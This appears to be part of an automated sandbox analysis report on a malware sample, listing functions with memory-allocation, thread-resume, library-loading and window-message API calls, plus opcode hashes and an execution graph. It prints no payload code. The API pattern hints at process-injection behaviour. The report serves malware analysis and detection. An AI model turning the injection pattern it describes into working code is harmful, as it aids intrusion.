                        • Instruction ID: 605e195387f65d05efe3bb09ee8c7a42a9164ecbf4aafca33124d1c47751f61c
                        • Opcode Fuzzy Hash: a7e99f263a7874c2441a4ec54849cd84af7056f985d026b3bcca5d5472c07d69
                        • Instruction Fuzzy Hash: B6112975D002499FCB10DFA9D445AEEBFF6FF88324F14841AE519A7250C7359541CFA1
                        Function 05D1A710 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D1A77E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 15bbf503116f8ea33be9639f83e6e8ae85c1f8ff797cd053837870249c0a0712
                        • Instruction ID: f24bed32b3571f20df4433a5a9d71a3e9252360ff873269d933ccc7d51017085
                        • Opcode Fuzzy Hash: 15bbf503116f8ea33be9639f83e6e8ae85c1f8ff797cd053837870249c0a0712
                        • Instruction Fuzzy Hash: A2113775D002499FCB10DFAAD845ADFBFF5EF88324F20841AE519A7250C775A541CFA1
                        Function 05D1A581 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 870d8eabccc003cb887beb3f6217609a02a5a8a93e6b7bcd0477041d4000e1a5
                        • Instruction ID: 1e793c6caa3872fb41c7a40628c2dd0dae8c41a4d2977609207a0f892abc6845
                        • Opcode Fuzzy Hash: 870d8eabccc003cb887beb3f6217609a02a5a8a93e6b7bcd0477041d4000e1a5
                        • Instruction Fuzzy Hash: FB1146B1D003098BCB10DFAAD4457EEFBF4EB89324F20841AD519A7240CB35A945CBA5
                        Function 0259B5A3 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0259B401,00000800,00000000,00000000), ref: 0259B612
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193676420.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2590000_ECcZgk.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 88fcbbe48ee11a029187936d55c6a959d3e0842d405b1b7c8723c8496a7e9474
                        • Instruction ID: 299a0959afa47bba10a96c56073ec65bc3757ae5672c9a227f005b141ded5e06
                        • Opcode Fuzzy Hash: 88fcbbe48ee11a029187936d55c6a959d3e0842d405b1b7c8723c8496a7e9474
                        • Instruction Fuzzy Hash: A011F0B6D002498FDB14CF9AD584ADEFBF5FB88314F14842ED919A7200C379A945CFA5
                        Function 05D1A588 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 2d347e11b545823f866674307cdb2c5ba61b7f0bba91150b8a3bde9a3b9d47e0
                        • Instruction ID: 29224e27ade39b4e4e80d872fdf5b470623217ac6284ef1cf65bb17a8a29f233
                        • Opcode Fuzzy Hash: 2d347e11b545823f866674307cdb2c5ba61b7f0bba91150b8a3bde9a3b9d47e0
                        • Instruction Fuzzy Hash: 591155B1D002098BCB20DFAAD4457EEFBF8EB88324F20841AC419A7240CB35A941CBA5
                        Function 05D1B958 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 05D1E4DD
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 550bd3230f2079ea3b200d8c330b5fe72c00c06716316edeca2518eace5f3614
                        • Instruction ID: 8bb7d3f5bf10f4fe41d0f18d3c25c7b21301eceaf693f962c869f6e94f31c4fc
                        • Opcode Fuzzy Hash: 550bd3230f2079ea3b200d8c330b5fe72c00c06716316edeca2518eace5f3614
                        • Instruction Fuzzy Hash: 1411F2B58003499FDB10DF9AD948BDEBFF8FB48324F10845AE959A7200C375A944CFA5
                        Function 0259B320 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0259B386
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193676420.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2590000_ECcZgk.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: ff537f863fa864ef2612a9fd9e064ae3d7f2b8e5e46e6b1264662282f61f0a48
                        • Instruction ID: fd1918e82845cf7a4b7013f15862f1167100fc73d1015600057236befe724303
                        • Opcode Fuzzy Hash: ff537f863fa864ef2612a9fd9e064ae3d7f2b8e5e46e6b1264662282f61f0a48
                        • Instruction Fuzzy Hash: 35110FB5C003498FDB10DF9AD444ADEFBF4EB88224F10845AD419A7210C379A545CFA5
                        Function 05D1E47B Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 05D1E4DD
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2197118625.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_5d10000_ECcZgk.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 162247aee81ae593bc51684020e59bd1c2c8c8d273ef3e4a0e02ab265ba6394e
                        • Instruction ID: 384ae0f7fd69cf3cf3ed8a61b80d8517d56d6b8aa7c209b2c8d5c283337a539b
                        • Opcode Fuzzy Hash: 162247aee81ae593bc51684020e59bd1c2c8c8d273ef3e4a0e02ab265ba6394e
                        • Instruction Fuzzy Hash: 5D11C2B58002499FDB10DF9AD985BDEBFF8FB48324F10845AE959A7200C375A944CFA5
                        Function 00E8D080 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193410322.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_e8d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f735a837088d3ea1e852687f788684e7cbdb12f0de76a0a5d3887070cc1b6c7c
                        • Instruction ID: 87f4601168cb74bcefbe21b30559066996af16fb44ad87a8ca36462502fefb67
                        • Opcode Fuzzy Hash: f735a837088d3ea1e852687f788684e7cbdb12f0de76a0a5d3887070cc1b6c7c
                        • Instruction Fuzzy Hash: 83216D75909380DFC7168F24C994B15BF71AF06214F1985EED8889B2A3C736981ACBA2
                        Function 00E7D3D8 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193368151.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_e7d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 275202cd1dbb79ef6ffe01239eed4ba76b48bd3cb718f56e7f66b7d94a597465
                        • Instruction ID: 39b842a9ec775e18ea0c87c38ac3b1632666d87933a2765d0a3437c6d4f1b580
                        • Opcode Fuzzy Hash: 275202cd1dbb79ef6ffe01239eed4ba76b48bd3cb718f56e7f66b7d94a597465
                        • Instruction Fuzzy Hash: 1C2136B1508204EFDB00DF04D9C0B16BF75FF94324F24C569D80D5B246D336E816C6A1
                        Function 00E8D0DC Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193410322.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_e8d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cf4594744c925fbf14d74d4a141c1dba586a8d43b62b9802db1eef46d361ed2
                        • Instruction ID: 642922c05824e5fd50d577a3b045021ce0254277a7ba26a76a028b9bfdf65507
                        • Opcode Fuzzy Hash: 0cf4594744c925fbf14d74d4a141c1dba586a8d43b62b9802db1eef46d361ed2
                        • Instruction Fuzzy Hash: 2911B2B4508204EFCB04EF14C988B16BB66EF88314F24C5ACE80E5B396C736D846CB61
                        Function 00E7D3D3 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193368151.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_e7d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction ID: aad6dfb716b8072b5f64c7bf1d8cc22bed4ba7e5c6ec0f99dd0b880758cf0944
                        • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction Fuzzy Hash: 95112672404240DFCB12CF00D9C4B16BF71FF94324F24C2A9D8090B656C33AE85ACBA1
                        Function 00E7D759 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193368151.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_e7d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a9edef309ddc76d36a3a887f594b37829f4800360c2c6a8f728298b0df4fc73
                        • Instruction ID: 6c4235aa7ea45c75bd15cf1509b5868a4f8c2750d76de21193f944da86d882b6
                        • Opcode Fuzzy Hash: 6a9edef309ddc76d36a3a887f594b37829f4800360c2c6a8f728298b0df4fc73
                        • Instruction Fuzzy Hash: 4D01A2710093409AE7148A2ADCC4B66BFB8DF51364F28D81BED0D2A286C3799844CAB1
                        Function 00E7D758 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193368151.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_e7d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 25ce606ffd99074c1ba7af911cdd311223958a60faac7c325dcd16dd6f722ebf
                        • Instruction ID: a3dc948e26623dbfb1397173e04a18fbf64ef17c9a1fe5eaf88360e8cddedc27
                        • Opcode Fuzzy Hash: 25ce606ffd99074c1ba7af911cdd311223958a60faac7c325dcd16dd6f722ebf
                        • Instruction Fuzzy Hash: 6AF0C271408340AEE7148A0ADC84B62FFA8EF50734F18C45AED4C1B286C3799844CAB1
                        Function 00E8D123 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2193410322.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_e8d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 68aca7dc0c0548756024f344f59a5a6f01ab4fed957a4ea54bac6f6b01f76d88
                        • Instruction ID: 13265ccdb5916c3c751650c2c2ef3efe70be75281933fa1bf6f5dea667a90809
                        • Opcode Fuzzy Hash: 68aca7dc0c0548756024f344f59a5a6f01ab4fed957a4ea54bac6f6b01f76d88
                        • Instruction Fuzzy Hash: 5CF08CB58042409FDB04DF24D988A56BFA1EF84328F28C6AEDC4D0B356C33AD416CB52

                        Execution Graph

                        Execution Coverage:13.9%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:30
                        Total number of Limit Nodes:1
                        execution_graph 29845 3000871 29849 30008c8 29845->29849 29854 30008d8 29845->29854 29846 3000889 29850 30008fa 29849->29850 29859 3000ce0 29850->29859 29863 3000ce8 29850->29863 29851 300093e 29851->29846 29855 30008fa 29854->29855 29857 3000ce0 GetConsoleWindow 29855->29857 29858 3000ce8 GetConsoleWindow 29855->29858 29856 300093e 29856->29846 29857->29856 29858->29856 29860 3000d26 GetConsoleWindow 29859->29860 29862 3000d56 29860->29862 29862->29851 29864 3000d26 GetConsoleWindow 29863->29864 29866 3000d56 29864->29866 29866->29851 29827 6ac6361 29828 6ac62fc 29827->29828 29829 6ac636a 29827->29829 29833 6ac7400 29828->29833 29837 6ac73f1 29828->29837 29830 6ac631d 29834 6ac7448 29833->29834 29836 6ac7451 29834->29836 29841 6ac6f98 29834->29841 29836->29830 29839 6ac7400 29837->29839 29838 6ac7451 29838->29830 29839->29838 29840 6ac6f98 LoadLibraryW 29839->29840 29840->29838 29842 6ac75f0 LoadLibraryW 29841->29842 29844 6ac7665 29842->29844 29844->29836

                        Executed Functions

                        Function 06AC6F98 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06AC74A6), ref: 06AC7656
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2332994480.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6ac0000_ECcZgk.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 998bf7bb7049204f7896c8a5770aea02df63fbf3358f046861176fb5e4237b72
                        • Instruction ID: 33e7c078b1fa0a46719c2cca58b0117cee11d22dda2248fc9940d74a1add91e0
                        • Opcode Fuzzy Hash: 998bf7bb7049204f7896c8a5770aea02df63fbf3358f046861176fb5e4237b72
                        • Instruction Fuzzy Hash: 821112B5C007498FCB10DF9AC844A9EFBF4AB88320F14842AD419B7300D375A545CFA5
                        Function 06AC75E8 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06AC74A6), ref: 06AC7656
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2332994480.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6ac0000_ECcZgk.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: b16ab31b8eb0983f7452deabbaa5e60bce01680a418252922ae653b902e81b1a
                        • Instruction ID: 534d7942cae74fc6d0c11caee6b5459b4381afaa3ab0fc3f10cd6e74c3541228
                        • Opcode Fuzzy Hash: b16ab31b8eb0983f7452deabbaa5e60bce01680a418252922ae653b902e81b1a
                        • Instruction Fuzzy Hash: 671112B5C007498FCB20DF9AD844A8EFBF4AF88320F10842AD459A7710D374A545CFA1
                        Function 03000CE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                        Download Yara Rule
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 03000D47
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2314543212.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_3000000_ECcZgk.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: 9a0528d29aa258cf4842be5be090a69e8d8a58fdd9186510d288e2898f6f4dae
                        • Instruction ID: 9302dafa7f9b732884ca6aadab43e2c78deca5831994960ca079d1cf41dcf6ff
                        • Opcode Fuzzy Hash: 9a0528d29aa258cf4842be5be090a69e8d8a58fdd9186510d288e2898f6f4dae
                        • Instruction Fuzzy Hash: B7111675D003098FDB24DFAAD8497EEFBF5AB88324F24841AC419A7250C7396545CFA1
                        Function 03000CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 03000D47
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2314543212.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_3000000_ECcZgk.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: f91474fc34154e2a8d6965b25e75d42605295e11bb14984f10abfe2f9488b530
                        • Instruction ID: 3f7d5d45ccb01021f9be072c697b27aa6e1cf7a9244c1a99601d740cd6c38d6c
                        • Opcode Fuzzy Hash: f91474fc34154e2a8d6965b25e75d42605295e11bb14984f10abfe2f9488b530
                        • Instruction Fuzzy Hash: 0C1103B5D003498FDB20DFAAD8457DFFFF5AB88324F24881AC419A7240CB79A545CBA1
                        Function 06B11550 Relevance: 1.4, Instructions: 1407COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1d58235a17d5bac2437efad8a3bbe960d02214b017ba344dd1b48ea35abbc1c5
                        • Instruction ID: a27240210b48516cf976f7e5acd45f6543f06f3cc30da49db69686f9d898a48d
                        • Opcode Fuzzy Hash: 1d58235a17d5bac2437efad8a3bbe960d02214b017ba344dd1b48ea35abbc1c5
                        • Instruction Fuzzy Hash: 57C24F74B001189FCB55DF58C851AAEBBB6FF88700F50809AE60AAF365DB71DE818F51
                        Function 06B1349D Relevance: 1.3, Instructions: 1277COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7ad9450799cd927ade2f0b3bde438a8f4a69bfae79941c213b53b82d22a11b0a
                        • Instruction ID: 30623b98f7865abb35a6469c3d4504bbd895f49ac00f726f38fab4efee267855
                        • Opcode Fuzzy Hash: 7ad9450799cd927ade2f0b3bde438a8f4a69bfae79941c213b53b82d22a11b0a
                        • Instruction Fuzzy Hash: 77A1C0B4B04205AFCB44DB68C854A6EBBF2FF89710B5184AAE516DB3A1DB31DC01CB61
                        Function 06B10048 Relevance: .7, Instructions: 665COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0ca271645641f687e962c3ea3da9e8aa0a236233b3435d90ccc97090bbe5d53a
                        • Instruction ID: 386de75e0dea546f5a331c5cf4947d5a36c2a60ee0cc6974e5a4f0cbc02f9aab
                        • Opcode Fuzzy Hash: 0ca271645641f687e962c3ea3da9e8aa0a236233b3435d90ccc97090bbe5d53a
                        • Instruction Fuzzy Hash: EF4288B070061A9FCB21EF68D45066EBBB2FB81710B114E5DD5029F295CF7AEC468BC6
                        Function 06B119BC Relevance: .6, Instructions: 574COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 63ec60a857798c653cf4d5b4f370a785b0ac9372726fccfa7acb9d43bd995114
                        • Instruction ID: 04219dc6a13479a17a29dd54a89f751d4b69167b4d6effabed04e4c84897262d
                        • Opcode Fuzzy Hash: 63ec60a857798c653cf4d5b4f370a785b0ac9372726fccfa7acb9d43bd995114
                        • Instruction Fuzzy Hash: 6F229574B002149FCB55DB14C991EAE77B6EF88704F6180CAEA0A9F395CB71ED818F91
                        Function 06B104F4 Relevance: .5, Instructions: 501COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a4baa71d058a91768ee07bdd2a6997e98c5cc4f3b24b8b2ed1975caf45dfbb69
                        • Instruction ID: 1b78100f6dfa655c8a04cce90c443db8e766cbd792948adc9d40e05843cb0d1b
                        • Opcode Fuzzy Hash: a4baa71d058a91768ee07bdd2a6997e98c5cc4f3b24b8b2ed1975caf45dfbb69
                        • Instruction Fuzzy Hash: 3E129CB07006169FCB21EF68D454A6E7BB2FF85700F504989E5029F3A5CF76EC468B86
                        Function 06B1056A Relevance: .5, Instructions: 466COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6dc654aaae8e5eda368e116489ff1695bd9e741a3fedf4e5af41a665478e9d0c
                        • Instruction ID: 55af409297aa952bdeeb5d0a9efb8488b4e7ea6701956645106dfff41ae3b157
                        • Opcode Fuzzy Hash: 6dc654aaae8e5eda368e116489ff1695bd9e741a3fedf4e5af41a665478e9d0c
                        • Instruction Fuzzy Hash: 82129DB07006159FCB11EF68D454A6E7BB2FF85700F504989E9029F3A5CFB6EC858B86
                        Function 06B105E0 Relevance: .4, Instructions: 428COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a18564242b136649610a22b2426aef887fe99b321f4f686d242e9f270b841a1a
                        • Instruction ID: 65103de9b88062d5dc0bb22accc54a2572f60ed538d49ab233d52ffdc3f475e1
                        • Opcode Fuzzy Hash: a18564242b136649610a22b2426aef887fe99b321f4f686d242e9f270b841a1a
                        • Instruction Fuzzy Hash: 910290B0B006159FDB10EF68C454A6E7BB2FF85700F508999E9029F3A5CF75EC858B82
                        Function 06B10656 Relevance: .4, Instructions: 390COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f351ec2119f2c4d76510b1d096d10fb707f0074d968145a5312faad125ba7a14
                        • Instruction ID: f7e3d864a9d88ea030ba2ed5e174be56f382d01e29ea91e18d942e0c6f35c75b
                        • Opcode Fuzzy Hash: f351ec2119f2c4d76510b1d096d10fb707f0074d968145a5312faad125ba7a14
                        • Instruction Fuzzy Hash: 80F191B0B00205DFDB50EF68C455A6E7BB2FF85700F518899E5029F3A5CB75DC858B92
                        Function 06B106CC Relevance: .4, Instructions: 356COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4b79cd22fffd8fb4d2c90c4032f79fed7323f7ea0f6c85dd6d0dbebcd327430f
                        • Instruction ID: e2b14835a37be75d6ebe5901d06100899d717936f2118c4a6068e194d7658a8c
                        • Opcode Fuzzy Hash: 4b79cd22fffd8fb4d2c90c4032f79fed7323f7ea0f6c85dd6d0dbebcd327430f
                        • Instruction Fuzzy Hash: 7CE171B0B00205EFDB50EF68C455A6E7BB2FF85700F518499E9029F3A5CB75DC858B91
                        Function 06B10002 Relevance: .4, Instructions: 352COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c2833da939b602c248b8cc0804eb523dd980c66199117b57f6a1eae1f0d8ff5d
                        • Instruction ID: 8db42343cb88535613b750f0a8381409afa29b43b07919e2fdb9759cac519782
                        • Opcode Fuzzy Hash: c2833da939b602c248b8cc0804eb523dd980c66199117b57f6a1eae1f0d8ff5d
                        • Instruction Fuzzy Hash: 42D180B0B04245EFDB419F68C855A6A7FB6FF85700F158096E9018F3A6CBB1DC85CB92
                        Function 06B13138 Relevance: .2, Instructions: 240COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07ef22a9988f5fad8d4b02b37c427b08850d783047cf42286c350cb2ed784091
                        • Instruction ID: ca54e4c5cf83eb38f98343c4387f93515b20f8d29a8e9130cf79aa4eba172a34
                        • Opcode Fuzzy Hash: 07ef22a9988f5fad8d4b02b37c427b08850d783047cf42286c350cb2ed784091
                        • Instruction Fuzzy Hash: 00917D35B102049FCB44DF68C894A9EBBF2EF89710B1680AAE9059F361EB31EC05CB51
                        Function 06B11308 Relevance: .2, Instructions: 201COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4b603c6211f754657e299091a956998d60ff0aac0b784725eda82ae12d4828d5
                        • Instruction ID: 3a216781d93ca9f89941705933d8eec4d4c6b38da96e0adbf63ec3715b5e057d
                        • Opcode Fuzzy Hash: 4b603c6211f754657e299091a956998d60ff0aac0b784725eda82ae12d4828d5
                        • Instruction Fuzzy Hash: EB517871B04745BFCB64AF7D988046ABBE5EFC2210B5485BBDA85CF254EB30C846C7A1
                        Function 0148D054 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2313541799.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_148d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
